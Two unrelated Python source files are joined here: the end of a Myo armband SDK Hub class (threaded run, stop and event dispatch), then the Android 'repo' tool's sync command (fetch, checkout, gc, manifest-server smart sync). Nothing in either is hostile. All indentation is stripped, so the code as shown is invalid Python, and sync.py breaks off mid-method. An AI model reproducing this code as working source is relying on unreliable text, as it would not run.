parts = ['<Hub ']
if not self._hub:
parts.append('shut down')
else:
with self._lock:
if self._running:
parts.append('running')
if self._stopped:
parts.append('stop-requested')
return ', '.join(parts) + '>'
def __nonzero__(self):
return bool(self._hub)
__bool__ = __nonzero__ # Python 3
def _assert_running(self):
with self._lock:
if not self._running:
raise RuntimeError('Hub is not running')
@property
def running(self):
"""
:return: True if the Hub is running, False if not.
"""
with self._lock:
return self._running
@property
def stop_requested(self):
"""
:return: True if the Hub has been stopped with a call to
:meth:`stop`, False if not. The Hub could still be
running though.
"""
with self._lock:
return self._stopped
stopped = stop_requested # Backwards compatibility
@property
def exception(self):
"""
Set when an exception occurred within the listener. The
Hub cannot be re-run if this is set. Use
:meth:`clear_exception` to remove the exception from the Hub.
"""
with self._lock:
return self._exception
def clear_exception(self):
"""
If an exception is set, the Hub cannot be re-run. This
method will clear the stored exception if there is any.
"""
with self._lock:
self._exception = None
def set_locking_policy(self, locking_policy):
"""
Sets the locking policy.
"""
with self._lock:
self._hub.set_locking_policy(locking_policy)
def _run(self, duration_ms, listener):
"""
Private version of the :meth:`run` method. Does not
re-set the :attr:`running` attribute. Used by :meth:`run`.
"""
if not isinstance(listener, DeviceListener):
raise TypeError('listener must be DeviceListener instance')
# If there is an exception set, an exception occurred
# in the listener and we will not do anything further!
with self._lock:
if self._exception:
message = 'exception occurred in listener, cannot rerun'
raise RuntimeError(message, self._exception)
def callback(listener, event):
# Stop immediately if the Hub was stopped via the
# stop() method.
with self._lock:
if self._stopped:
return False
# Invoke the listener, catching and recording any exception it raises.
try:
return _invoke_listener(listener, event)
except Exception as exc:
traceback.print_exc()
with self._lock:
self._exception = exc
return False
return self._hub.run(duration_ms, callback, listener)
def run(self, interval_ms, listener, lil_sleep=0.01):
"""
Run the Hub with an execution interval of *interval_ms*
and the specified *listener* until the Hub was stopped. This
method does not block the main thread. Returns the thread
object that was created.
The Hub and its thread will stop as soon as :meth:`stop`
was called or the :class:`DeviceListener` returns False
from one of its callback methods.
*lil_sleep* specifies a number of seconds to sleep after
the Hub has been started. This will allow the Hub thread
to start before anything else is called.
"""
if not isinstance(listener, DeviceListener):
raise TypeError('listener must be DeviceListener instance')
# Make sure the Hub doesn't run already and set
# the running flag to True.
with self._lock:
if self._running:
raise RuntimeError('Hub is already running')
self._running = True
# This is the worker function that is running in
# a new thread.
def worker():
while not self.stop_requested:
if not self._run(interval_ms, listener):
self.stop()
with self._lock:
self._running = False
with self._lock:
self._thread = threading.Thread(target=worker)
self._thread.start()
# Little sleeping so we can immediately call pair_any()
# or variants.
if lil_sleep:
time.sleep(lil_sleep)
def stop(self, join=False):
"""
Request the Hub to stop while it is running. When
*join* is True, this function will block the current thread
until the Hub is not :attr:`running` anymore.
"""
with self._lock:
self._stopped = True
if join: self.join()
def join(self, timeout=None):
"""
If the Hub was run with a thread, it can be joined (waiting
blocked) with this method. If the Hub was not started within a
thread, this method will do nothing.
"""
with self._lock:
if not self._thread:
return
if not self._thread.is_alive():
self._thread = None
return
thread = self._thread
thread.join(timeout)
with self._lock:
if not thread.is_alive():
self._thread = None
def shutdown(self):
"""
Shut the hub down. If the hub is still running, it will be
stopped right where it is. Call this method before the hub is
garbage collected, otherwise a warning will be printed that it
was never called.
Do not call this method from a DeviceListener as it would
cause the current thread to be joined which is not possible.
Use :meth:`stop` to request a stop.
"""
self.stop()
try:
self.join()
except RuntimeError:
message = 'Hub.shutdown() must not be called from DeviceListener'
raise RuntimeError(message)
self._hub.shutdown()
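# A minimal usage sketch (assumes a paired Myo device; the callback name
# follows the dispatch in _invoke_listener below):
#
#   myo_init()  # load the low-level SDK bindings
#
#   class Listener(DeviceListener):
#       def on_pose(self, myo, timestamp, pose):
#           print('pose:', pose)
#
#   hub = Hub()
#   hub.run(1000, Listener())  # non-blocking; runs in a worker thread
#   hub.shutdown()             # stop, join the thread, shut the hub down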
def _invoke_listener(listener, event):
"""
Invokes the :class:`DeviceListener` callback methods for
the specified :class:`event<myo.lowlevel.event_t>`. If any
of the callbacks return False, this function will return False
as well. It also issues a warning when a DeviceListener method
did not return None or a boolean value.
:meth:`DeviceListener.on_event_finished` is always called,
even when one of the preceding calls already returned False.
"""
myo = event.myo
timestamp = event.timestamp
# Invokes a method on the listener. If defaults=True, will prepend
# the myo and timestamp argument to *args.
def _(name, *args, **kwargs):
defaults = kwargs.pop('defaults', True)
if kwargs:
raise TypeError('unexpected arguments')
if defaults:
args = (myo, timestamp) + tuple(args)
method = getattr(listener, name)
result = method(*args)
if result is None:
return True
elif not isinstance(result, bool):
sys.stderr.write('DeviceListener.%s() must return None or bool\n' % name)
result = False
return result
kind = event.type
result = _('on_event', kind, event, defaults=False)
if kind == EventType.paired:
result = result and _('on_pair')
elif kind == EventType.unpaired:
result = result and _('on_unpair')
elif kind == EventType.connected:
result = result and _('on_connect')
elif kind == EventType.disconnected:
result = result and _('on_disconnect')
elif kind == EventType.pose:
result = result and _('on_pose', event.pose)
elif kind == EventType.orientation:
result = result and _('on_orientation_data', event.orientation)
result = result and _('on_accelerometor_data', event.acceleration)  # sic: historical spelling kept for API compatibility
result = result and _('on_gyroscope_data', event.gyroscope)
elif kind == EventType.rssi:
result = result and _('on_rssi', event.rssi)
elif kind == EventType.emg:
result = result and _('on_emg', event.emg)
elif kind == EventType.arm_unsynced:
result = result and _('on_unsync')
elif kind == EventType.arm_synced:
result = result and _('on_sync', event.arm, event.x_direction)
elif kind == EventType.unlocked:
result = result and _('on_unlock')
elif kind == EventType.locked:
result = result and _('on_lock')
else:
raise RuntimeError('invalid event type: %s' % kind)
if not _('on_event_finished', kind, event, defaults=False):
result = False
return result
# Backwards compatibility
event_type = EventType
pose = Pose
locking_policy = LockingPolicy
init_myo = myo_init
|
sync.py | # Copyright (C) 2008 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
import http.cookiejar as cookielib
import io
import json
import multiprocessing
import netrc
from optparse import SUPPRESS_HELP
import os
import re
import socket
import subprocess
import sys
import tempfile
import time
import urllib.error
import urllib.parse
import urllib.request
import xmlrpc.client
try:
import threading as _threading
except ImportError:
import dummy_threading as _threading
try:
import resource
def _rlimit_nofile():
return resource.getrlimit(resource.RLIMIT_NOFILE)
except ImportError:
def _rlimit_nofile():
return (256, 256)
try:
import multiprocessing
except ImportError:
multiprocessing = None
import event_log
from git_command import GIT, git_require
from git_config import GetUrlCookieFile
from git_refs import R_HEADS, HEAD
import git_superproject
import gitc_utils
from project import Project
from project import RemoteSpec
from command import Command, MirrorSafeCommand, WORKER_BATCH_SIZE
from error import RepoChangedException, GitError, ManifestParseError
import platform_utils
from project import SyncBuffer
from progress import Progress
from wrapper import Wrapper
from manifest_xml import GitcManifest
_ONE_DAY_S = 24 * 60 * 60
class _FetchError(Exception):
"""Internal error thrown in _FetchHelper() when we don't want stack trace."""
class Sync(Command, MirrorSafeCommand):
jobs = 1
common = True
helpSummary = "Update working tree to the latest revision"
helpUsage = """
%prog [<project>...]
"""
helpDescription = """
The '%prog' command synchronizes local project directories
with the remote repositories specified in the manifest. If a local
project does not yet exist, it will clone a new local directory from
the remote repository and set up tracking branches as specified in
the manifest. If the local project already exists, '%prog'
will update the remote branches and rebase any new local changes
on top of the new remote changes.
'%prog' will synchronize all projects listed at the command
line. Projects can be specified either by name, or by a relative
or absolute path to the project's local directory. If no projects
are specified, '%prog' will synchronize all projects listed in
the manifest.
The -d/--detach option can be used to switch specified projects
back to the manifest revision. This option is especially helpful
if the project is currently on a topic branch, but the manifest
revision is temporarily needed.
The -s/--smart-sync option can be used to sync to a known good
build as specified by the manifest-server element in the current
manifest. The -t/--smart-tag option is similar and allows you to
specify a custom tag/label.
The -u/--manifest-server-username and -p/--manifest-server-password
options can be used to specify a username and password to authenticate
with the manifest server when using the -s or -t option.
If -u and -p are not specified when using the -s or -t option, '%prog'
will attempt to read authentication credentials for the manifest server
from the user's .netrc file.
'%prog' will not use authentication credentials from -u/-p or .netrc
if the manifest server specified in the manifest file already includes
credentials.
By default, all projects will be synced. The --fail-fast option can be used
to halt syncing as soon as possible when the first project fails to sync.
The --force-sync option can be used to overwrite existing git
directories if they have previously been linked to a different
object directory. WARNING: This may cause data to be lost since
refs may be removed when overwriting.
The --force-remove-dirty option can be used to remove previously used
projects with uncommitted changes. WARNING: This may cause data to be
lost since uncommitted changes may be removed with projects that no longer
exist in the manifest.
The --no-clone-bundle option disables any attempt to use
$URL/clone.bundle to bootstrap a new Git repository from a
resumeable bundle file on a content delivery network. This
may be necessary if there are problems with the local Python
HTTP client or proxy configuration, but the Git binary works.
The --fetch-submodules option enables fetching Git submodules
of a project from server.
The -c/--current-branch option can be used to only fetch objects that
are on the branch specified by a project's revision.
The --optimized-fetch option can be used to only fetch projects that
are fixed to a sha1 revision if the sha1 revision does not already
exist locally.
The --prune option can be used to remove any refs that no longer
exist on the remote.
# SSH Connections
If at least one project remote URL uses an SSH connection (ssh://,
git+ssh://, or user@host:path syntax) repo will automatically
enable the SSH ControlMaster option when connecting to that host.
This feature permits other projects in the same '%prog' session to
reuse the same SSH tunnel, saving connection setup overheads.
To disable this behavior on UNIX platforms, set the GIT_SSH
environment variable to 'ssh'. For example:
export GIT_SSH=ssh
%prog
# Compatibility
This feature is automatically disabled on Windows, due to the lack
of UNIX domain socket support.
This feature is not compatible with url.insteadof rewrites in the
user's ~/.gitconfig. '%prog' is currently not able to perform the
rewrite early enough to establish the ControlMaster tunnel.
If the remote SSH daemon is Gerrit Code Review, version 2.0.10 or
later is required to fix a server side protocol bug.
"""
PARALLEL_JOBS = 1
def _Options(self, p, show_smart=True):
try:
self.PARALLEL_JOBS = self.manifest.default.sync_j
except ManifestParseError:
pass
super()._Options(p)
p.add_option('-f', '--force-broken',
dest='force_broken', action='store_true',
help='obsolete option (to be deleted in the future)')
p.add_option('--fail-fast',
dest='fail_fast', action='store_true',
help='stop syncing after first error is hit')
p.add_option('--force-sync',
dest='force_sync', action='store_true',
help="overwrite an existing git directory if it needs to "
"point to a different object directory. WARNING: this "
"may cause loss of data")
p.add_option('--force-remove-dirty',
dest='force_remove_dirty', action='store_true',
help="force remove projects with uncommitted modifications if "
"projects no longer exist in the manifest. "
"WARNING: this may cause loss of data")
p.add_option('-l', '--local-only',
dest='local_only', action='store_true',
help="only update working tree, don't fetch")
p.add_option('--no-manifest-update', '--nmu',
dest='mp_update', action='store_false', default=True,
help='use the existing manifest checkout as-is. '
'(do not update to the latest revision)')
p.add_option('-n', '--network-only',
dest='network_only', action='store_true',
help="fetch only, don't update working tree")
p.add_option('-d', '--detach',
dest='detach_head', action='store_true',
help='detach projects back to manifest revision')
p.add_option('-c', '--current-branch',
dest='current_branch_only', action='store_true',
help='fetch only current branch from server')
p.add_option('-v', '--verbose',
dest='output_mode', action='store_true',
help='show all sync output')
p.add_option('-q', '--quiet',
dest='output_mode', action='store_false',
help='only show errors')
p.add_option('-m', '--manifest-name',
dest='manifest_name',
help='temporary manifest to use for this sync', metavar='NAME.xml')
p.add_option('--clone-bundle', action='store_true',
help='enable use of /clone.bundle on HTTP/HTTPS')
p.add_option('--no-clone-bundle', dest='clone_bundle', action='store_false',
help='disable use of /clone.bundle on HTTP/HTTPS')
p.add_option('-u', '--manifest-server-username', action='store',
dest='manifest_server_username',
help='username to authenticate with the manifest server')
p.add_option('-p', '--manifest-server-password', action='store',
dest='manifest_server_password',
help='password to authenticate with the manifest server')
p.add_option('--fetch-submodules',
dest='fetch_submodules', action='store_true',
help='fetch submodules from server')
p.add_option('--use-superproject', action='store_true',
help='use the manifest superproject to sync projects')
p.add_option('--no-tags',
dest='tags', default=True, action='store_false',
help="don't fetch tags")
p.add_option('--optimized-fetch',
dest='optimized_fetch', action='store_true',
help='only fetch projects fixed to sha1 if revision does not exist locally')
p.add_option('--retry-fetches',
default=0, action='store', type='int',
help='number of times to retry fetches on transient errors')
p.add_option('--prune', dest='prune', action='store_true',
help='delete refs that no longer exist on the remote')
p.add_option('--cache-dir', dest='cache_dir', action='store',
help='Use git-cache to populate project cache into this '
'directory. Bootstrap the local repository from this '
'directory if the project cache exists. This applies '
'to the projects on chromium and chrome-internal.')
if show_smart:
p.add_option('-s', '--smart-sync',
dest='smart_sync', action='store_true',
help='smart sync using manifest from the latest known good build')
p.add_option('-t', '--smart-tag',
dest='smart_tag', action='store',
help='smart sync using manifest from a known tag')
g = p.add_option_group('repo Version options')
g.add_option('--no-repo-verify',
dest='repo_verify', default=True, action='store_false',
help='do not verify repo source code')
g.add_option('--repo-upgraded',
dest='repo_upgraded', action='store_true',
help=SUPPRESS_HELP)
def _GetBranch(self):
"""Returns the branch name for getting the approved manifest."""
p = self.manifest.manifestProject
b = p.GetBranch(p.CurrentBranch)
branch = b.merge
if branch.startswith(R_HEADS):
branch = branch[len(R_HEADS):]
return branch
def _UseSuperproject(self, opt):
"""Returns True if use-superproject option is enabled"""
return (opt.use_superproject or
self.manifest.manifestProject.config.GetBoolean(
'repo.superproject'))
def _GetCurrentBranchOnly(self, opt):
"""Returns True if current-branch or use-superproject options are enabled."""
return opt.current_branch_only or self._UseSuperproject(opt)
def _UpdateProjectsRevisionId(self, opt, args):
"""Update revisionId of every project with the SHA from superproject.
This function updates each project's revisionId with SHA from superproject.
It writes the updated manifest into a file and reloads the manifest from it.
Args:
opt: Program options returned from optparse. See _Options().
args: Arguments to pass to GetProjects. See the GetProjects
docstring for details.
Returns:
Returns path to the overriding manifest file.
"""
superproject = git_superproject.Superproject(self.manifest,
self.repodir,
quiet=opt.quiet)
all_projects = self.GetProjects(args,
missing_ok=True,
submodules_ok=opt.fetch_submodules)
manifest_path = superproject.UpdateProjectsRevisionId(all_projects)
if not manifest_path:
print('error: Update of revisionId from superproject has failed',
file=sys.stderr)
sys.exit(1)
self._ReloadManifest(manifest_path)
return manifest_path
def _FetchProjectList(self, opt, projects, sem, *args, **kwargs):
"""Main function of the fetch threads.
Delegates most of the work to _FetchHelper.
Args:
opt: Program options returned from optparse. See _Options().
projects: Projects to fetch.
sem: We'll release() this semaphore when we exit so that another thread
can be started up.
*args, **kwargs: Remaining arguments to pass to _FetchHelper. See the
_FetchHelper docstring for details.
"""
try:
for project in projects:
success = self._FetchHelper(opt, project, *args, **kwargs)
if not success and opt.fail_fast:
break
finally:
sem.release()
def _FetchHelper(self, opt, project, lock, fetched, pm, err_event,
clone_filter):
"""Fetch git objects for a single project.
Args:
opt: Program options returned from optparse. See _Options().
project: Project object for the project to fetch.
lock: Lock for accessing objects that are shared amongst multiple
_FetchHelper() threads.
fetched: set object that we will add project.gitdir to when we're done
(with our lock held).
pm: Progress instance used for status reporting. We will call pm.update() (with our
lock held).
err_event: We'll set this event in the case of an error (after printing
out info about the error).
clone_filter: Filter for use in a partial clone.
Returns:
Whether the fetch was successful.
"""
# We'll set to true once we've locked the lock.
did_lock = False
# Encapsulate everything in a try/except/finally so that:
# - We always set err_event in the case of an exception.
# - We always make sure we unlock the lock if we locked it.
start = time.time()
success = False
buf = io.StringIO()
with lock:
pm.start(project.name)
try:
try:
success = project.Sync_NetworkHalf(
quiet=opt.quiet,
verbose=opt.verbose,
output_redir=buf,
current_branch_only=self._GetCurrentBranchOnly(opt),
force_sync=opt.force_sync,
clone_bundle=opt.clone_bundle,
tags=opt.tags, archive=self.manifest.IsArchive,
optimized_fetch=opt.optimized_fetch,
retry_fetches=opt.retry_fetches,
prune=opt.prune,
cache_dir=opt.cache_dir,
clone_filter=clone_filter)
self._fetch_times.Set(project, time.time() - start)
# Lock around all the rest of the code, since printing, updating a set
# and Progress.update() are not thread safe.
lock.acquire()
did_lock = True
output = buf.getvalue()
if opt.verbose and output:
pm.update(inc=0, msg=output.rstrip())
if not success:
err_event.set()
print('error: Cannot fetch %s from %s'
% (project.name, project.remote.url),
file=sys.stderr)
if opt.fail_fast:
raise _FetchError()
fetched.add(project.gitdir)
except _FetchError:
pass
except Exception as e:
print('error: Cannot fetch %s (%s: %s)'
% (project.name, type(e).__name__, str(e)), file=sys.stderr)
err_event.set()
raise
finally:
if not did_lock:
lock.acquire()
pm.finish(project.name)
lock.release()
finish = time.time()
self.event_log.AddSync(project, event_log.TASK_SYNC_NETWORK,
start, finish, success)
return success
def _Fetch(self, projects, opt, err_event):
fetched = set()
lock = _threading.Lock()
pm = Progress('Fetching', len(projects))
objdir_project_map = dict()
for project in projects:
objdir_project_map.setdefault(project.objdir, []).append(project)
threads = set()
sem = _threading.Semaphore(self.jobs)
for project_list in objdir_project_map.values():
# Check for any errors before running any more tasks.
# ...we'll let existing threads finish, though.
if err_event.is_set() and opt.fail_fast:
break
sem.acquire()
kwargs = dict(opt=opt,
projects=project_list,
sem=sem,
lock=lock,
fetched=fetched,
pm=pm,
err_event=err_event,
clone_filter=self.manifest.CloneFilter)
if self.jobs > 1:
t = _threading.Thread(target=self._FetchProjectList,
kwargs=kwargs)
# Ensure that Ctrl-C will not freeze the repo process.
t.daemon = True
threads.add(t)
t.start()
else:
self._FetchProjectList(**kwargs)
for t in threads:
t.join()
pm.end()
self._fetch_times.Save()
if not self.manifest.IsArchive:
self._GCProjects(projects, opt, err_event)
return fetched
def _CheckoutOne(self, opt, project):
"""Checkout work tree for one project
Args:
opt: Program options returned from optparse. See _Options().
project: Project object for the project to checkout.
Returns:
Whether the fetch was successful.
"""
start = time.time()
syncbuf = SyncBuffer(self.manifest.manifestProject.config,
detach_head=opt.detach_head)
success = False
try:
project.Sync_LocalHalf(syncbuf, force_sync=opt.force_sync)
success = syncbuf.Finish()
except Exception as e:
print('error: Cannot checkout %s: %s: %s' %
(project.name, type(e).__name__, str(e)),
file=sys.stderr)
raise
if not success:
print('error: Cannot checkout %s' % (project.name), file=sys.stderr)
finish = time.time()
return (success, project, start, finish)
def _Checkout(self, all_projects, opt, err_results):
"""Checkout projects listed in all_projects
Args:
all_projects: List of all projects that should be checked out.
opt: Program options returned from optparse. See _Options().
err_results: A list of strings, paths to git repos where checkout failed.
"""
ret = True
# Only checkout projects with worktrees.
all_projects = [x for x in all_projects if x.worktree]
pm = Progress('Checking out', len(all_projects))
def _ProcessResults(results):
for (success, project, start, finish) in results:
self.event_log.AddSync(project, event_log.TASK_SYNC_LOCAL,
start, finish, success)
# Check for any errors before running any more tasks.
# ...we'll let existing threads finish, though.
if not success:
err_results.append(project.relpath)
if opt.fail_fast:
return False
pm.update(msg=project.name)
return True
# NB: Multiprocessing is heavy, so don't spin it up for one job.
if len(all_projects) == 1 or opt.jobs == 1:
if not _ProcessResults(self._CheckoutOne(opt, x) for x in all_projects):
ret = False
else:
with multiprocessing.Pool(opt.jobs) as pool:
results = pool.imap_unordered(
functools.partial(self._CheckoutOne, opt),
all_projects,
chunksize=WORKER_BATCH_SIZE)
if not _ProcessResults(results):
ret = False
pool.close()
pm.end()
return ret and not err_results
def _GCProjects(self, projects, opt, err_event):
gc_gitdirs = {}
for project in projects:
# Make sure pruning never kicks in with shared projects.
if (not project.use_git_worktrees and
len(project.manifest.GetProjectsWithName(project.name)) > 1):
if not opt.quiet:
print('%s: Shared project %s found, disabling pruning.' %
(project.relpath, project.name))
if git_require((2, 7, 0)):
project.EnableRepositoryExtension('preciousObjects')
else:
# This isn't perfect, but it's the best we can do with old git.
print('%s: WARNING: shared projects are unreliable when using old '
'versions of git; please upgrade to git-2.7.0+.'
% (project.relpath,),
file=sys.stderr)
project.config.SetString('gc.pruneExpire', 'never')
gc_gitdirs[project.gitdir] = project.bare_git
if multiprocessing:
cpu_count = multiprocessing.cpu_count()
else:
cpu_count = 1
jobs = min(self.jobs, cpu_count)
if jobs < 2:
for bare_git in gc_gitdirs.values():
bare_git.gc('--auto')
return
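# Split the machine's cores across the concurrent gc invocations so the
# total number of pack threads roughly matches the CPU count.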
config = {'pack.threads': cpu_count // jobs if cpu_count > jobs else 1}
threads = set()
sem = _threading.Semaphore(jobs)
def GC(bare_git):
try:
try:
bare_git.gc('--auto', config=config)
except GitError:
err_event.set()
except Exception:
err_event.set()
raise
finally:
sem.release()
for bare_git in gc_gitdirs.values():
if err_event.is_set() and opt.fail_fast:
break
sem.acquire()
t = _threading.Thread(target=GC, args=(bare_git,))
t.daemon = True
threads.add(t)
t.start()
for t in threads:
t.join()
def _ReloadManifest(self, manifest_name=None):
if manifest_name:
# Override calls _Unload already
self.manifest.Override(manifest_name)
else:
self.manifest._Unload()
def UpdateProjectList(self, opt):
new_project_paths = []
for project in self.GetProjects(None, missing_ok=True):
if project.relpath:
new_project_paths.append(project.relpath)
file_name = 'project.list'
file_path = os.path.join(self.repodir, file_name)
old_project_paths = []
if os.path.exists(file_path):
with open(file_path, 'r') as fd:
old_project_paths = fd.read().split('\n')
# In reversed order, so subfolders are deleted before parent folder.
for path in sorted(old_project_paths, reverse=True):
if not path:
continue
if path not in new_project_paths:
# If the path has already been deleted, we don't need to do it
gitdir = os.path.join(self.manifest.topdir, path, '.git')
if os.path.exists(gitdir):
project = Project(
manifest=self.manifest,
name=path,
remote=RemoteSpec('origin'),
gitdir=gitdir,
objdir=gitdir,
use_git_worktrees=os.path.isfile(gitdir),
worktree=os.path.join(self.manifest.topdir, path),
relpath=path,
revisionExpr='HEAD',
revisionId=None,
groups=None)
if not project.DeleteWorktree(
quiet=opt.quiet,
force=opt.force_remove_dirty):
return 1
new_project_paths.sort()
with open(file_path, 'w') as fd:
fd.write('\n'.join(new_project_paths))
fd.write('\n')
return 0
def _SmartSyncSetup(self, opt, smart_sync_manifest_path):
if not self.manifest.manifest_server:
print('error: cannot smart sync: no manifest server defined in '
'manifest', file=sys.stderr)
sys.exit(1)
manifest_server = self.manifest.manifest_server
if not opt.quiet:
print('Using manifest server %s' % manifest_server)
if '@' not in manifest_server:
username = None
password = None
if opt.manifest_server_username and opt.manifest_server_password:
username = opt.manifest_server_username
password = opt.manifest_server_password
else:
try:
info = netrc.netrc()
except IOError:
# .netrc file does not exist or could not be opened
pass
else:
try:
parse_result = urllib.parse.urlparse(manifest_server)
if parse_result.hostname:
auth = info.authenticators(parse_result.hostname)
if auth:
username, _account, password = auth
else:
print('No credentials found for %s in .netrc'
% parse_result.hostname, file=sys.stderr)
except netrc.NetrcParseError as e:
print('Error parsing .netrc file: %s' % e, file=sys.stderr)
if (username and password):
manifest_server = manifest_server.replace('://', '://%s:%s@' %
(username, password),
1)
transport = PersistentTransport(manifest_server)
if manifest_server.startswith('persistent-'):
manifest_server = manifest_server[len('persistent-'):]
try:
server = xmlrpc.client.Server(manifest_server, transport=transport)
if opt.smart_sync:
branch = self._GetBranch()
if 'SYNC_TARGET' in os.environ:
target = os.environ['SYNC_TARGET']
[success, manifest_str] = server.GetApprovedManifest(branch, target)
elif ('TARGET_PRODUCT' in os.environ and
'TARGET_BUILD_VARIANT' in os.environ):
target = '%s-%s' % (os.environ['TARGET_PRODUCT'],
os.environ['TARGET_BUILD_VARIANT'])
[success, manifest_str] = server.GetApprovedManifest(branch, target)
else:
[success, manifest_str] = server.GetApprovedManifest(branch)
else:
assert(opt.smart_tag)
[success, manifest_str] = server.GetManifest(opt.smart_tag)
if success:
manifest_name = os.path.basename(smart_sync_manifest_path)
try:
with open(smart_sync_manifest_path, 'w') as f:
f.write(manifest_str)
except IOError as e:
print('error: cannot write manifest to %s:\n%s'
% (smart_sync_manifest_path, e),
file=sys.stderr)
sys.exit(1)
self._ReloadManifest(manifest_name)
else:
print('error: manifest server RPC call failed: %s' %
manifest_str, file=sys.stderr)
sys.exit(1)
except (socket.error, IOError, xmlrpc.client.Fault) as e:
print('error: cannot connect to manifest server %s:\n%s'
% (self.manifest.manifest_server, e), file=sys.stderr)
sys.exit(1)
except xmlrpc.client.ProtocolError as e:
print('error: cannot connect to manifest server %s:\n%d %s'
% (self.manifest.manifest_server, e.errcode, e.errmsg),
file=sys.stderr)
sys.exit(1)
return manifest_name
def _UpdateManifestProject(self, opt, mp, manifest_name):
"""Fetch & update the local manifest project."""
if not opt.local_only:
start = time.time()
success = mp.Sync_NetworkHalf(quiet=opt.quiet, verbose=opt.verbose,
current_branch_only=self._GetCurrentBranchOnly(opt),
force_sync=opt.force_sync,
tags=opt.tags,
optimized_fetch=opt.optimized_fetch,
retry_fetches=opt.retry_fetches,
submodules=self.manifest.HasSubmodules,
clone_filter=self.manifest.CloneFilter,
cache_dir=opt.cache_dir)
finish = time.time()
self.event_log.AddSync(mp, event_log.TASK_SYNC_NETWORK,
start, finish, success)
if mp.HasChanges:
syncbuf = SyncBuffer(mp.config)
start = time.time()
mp.Sync_LocalHalf(syncbuf, submodules=self.manifest.HasSubmodules)
clean = syncbuf.Finish()
self.event_log.AddSync(mp, event_log.TASK_SYNC_LOCAL,
start, time.time(), clean)
if not clean:
sys.exit(1)
self._ReloadManifest(opt.manifest_name)
if opt.jobs is None:
self.jobs = self.manifest.default.sync_j
def ValidateOptions(self, opt, args):
if opt.force_broken:
print('warning: -f/--force-broken is now the default behavior, and the '
'options are deprecated', file=sys.stderr)
if opt.network_only and opt.detach_head:
self.OptionParser.error('cannot combine -n and -d')
if opt.network_only and opt.local_only:
self.OptionParser.error('cannot combine -n and -l')
if opt.manifest_name and opt.smart_sync:
self.OptionParser.error('cannot combine -m and -s')
if opt.manifest_name and opt.smart_tag:
self.OptionParser.error('cannot combine -m and -t')
if opt.manifest_server_username or opt.manifest_server_password:
if not (opt.smart_sync or opt.smart_tag):
self.OptionParser.error('-u and -p may only be combined with -s or -t')
if None in [opt.manifest_server_username, opt.manifest_server_password]:
self.OptionParser.error('both -u and -p must be given')
def Execute(self, opt, args):
if opt.jobs:
self.jobs = opt.jobs
if self.jobs > 1:
soft_limit, _ = _rlimit_nofile()
self.jobs = min(self.jobs, (soft_limit - 5) // 3)
opt.quiet = opt.output_mode is False
opt.verbose = opt.output_mode is True
cache_dir = opt.cache_dir
if cache_dir:
if self.manifest.IsMirror or self.manifest.IsArchive:
print('fatal: --cache-dir is not supported with mirror or archive '
'repository.')
sys.exit(1)
if os.path.isfile(cache_dir):
print('fatal: %s: cache_dir must be a directory' % cache_dir, file=sys.stderr)
sys.exit(1)
os.makedirs(opt.cache_dir, exist_ok=True)
if opt.manifest_name:
self.manifest.Override(opt.manifest_name)
manifest_name = opt.manifest_name
smart_sync_manifest_path = os.path.join(
self.manifest.manifestProject.worktree, 'smart_sync_override.xml')
if opt.clone_bundle is None:
opt.clone_bundle = self.manifest.CloneBundle
if opt.smart_sync or opt.smart_tag:
manifest_name = self._SmartSyncSetup(opt, smart_sync_manifest_path)
else:
if os.path.isfile(smart_sync_manifest_path):
try:
platform_utils.remove(smart_sync_manifest_path)
except OSError as e:
print('error: failed to remove existing smart sync override manifest: %s' %
e, file=sys.stderr)
err_event = _threading.Event()
rp = self.manifest.repoProject
rp.PreSync()
cb = rp.CurrentBranch
if cb:
base = rp.GetBranch(cb).merge
if not base or not base.startswith('refs/heads/'):
print('warning: repo is not tracking a remote branch, so it will not '
'receive updates; run `repo init --repo-rev=stable` to fix.',
file=sys.stderr)
mp = self.manifest.manifestProject
mp.PreSync()
if opt.repo_upgraded:
_PostRepoUpgrade(self.manifest, quiet=opt.quiet)
if not opt.mp_update:
print('Skipping update of local manifest project.')
else:
self._UpdateManifestProject(opt, mp, manifest_name)
if self._UseSuperproject(opt):
manifest_name = self._UpdateProjectsRevisionId(opt, args)
if self.gitc_manifest:
gitc_manifest_projects = self.GetProjects(args,
missing_ok=True)
gitc_projects = []
opened_projects = []
for project in gitc_manifest_projects:
if project.relpath in self.gitc_manifest.paths and \
self.gitc_manifest.paths[project.relpath].old_revision:
opened_projects.append(project.relpath)
else:
gitc_projects.append(project.relpath)
if not args:
gitc_projects = None
if gitc_projects != [] and not opt.local_only:
print('Updating GITC client: %s' % self.gitc_manifest.gitc_client_name)
manifest = GitcManifest(self.repodir, self.gitc_manifest.gitc_client_name)
if manifest_name:
manifest.Override(manifest_name)
else:
manifest.Override(self.manifest.manifestFile)
gitc_utils.generate_gitc_manifest(self.gitc_manifest,
manifest,
gitc_projects)
print('GITC client successfully synced.')
# The opened projects need to be synced as normal, therefore we
# generate a new args list to represent the opened projects.
# TODO: make this more reliable -- if there's a project name/path overlap,
# this may choose the wrong project.
args = [os.path.relpath(self.manifest.paths[path].worktree, os.getcwd())
for path in opened_projects]
if not args:
return
all_projects = self.GetProjects(args,
missing_ok=True,
submodules_ok=opt.fetch_submodules)
err_network_sync = False
err_update_projects = False
self._fetch_times = _FetchTimes(self.manifest)
if not opt.local_only:
to_fetch = []
now = time.time()
if _ONE_DAY_S <= (now - rp.LastFetch):
to_fetch.append(rp)
to_fetch.extend(all_projects)
to_fetch.sort(key=self._fetch_times.Get, reverse=True)
fetched = self._Fetch(to_fetch, opt, err_event)
_PostRepoFetch(rp, opt.repo_verify)
if opt.network_only:
# bail out now; the rest touches the working tree
if err_event.is_set():
print('\nerror: Exited sync due to fetch errors.\n', file=sys.stderr)
sys.exit(1)
return
# Iteratively fetch missing and/or nested unregistered submodules
previously_missing_set = set()
while True:
self._ReloadManifest(manifest_name)
all_projects = self.GetProjects(args,
missing_ok=True,
submodules_ok=opt.fetch_submodules)
missing = []
for project in all_projects:
if project.gitdir not in fetched:
missing.append(project)
if not missing:
break
# Stop us from fetching actually-missing repos forever: if the set of
# missing repos has not changed since the last fetch, break out.
missing_set = set(p.name for p in missing)
if previously_missing_set == missing_set:
break
previously_missing_set = missing_set
fetched.update(self._Fetch(missing, opt, err_event))
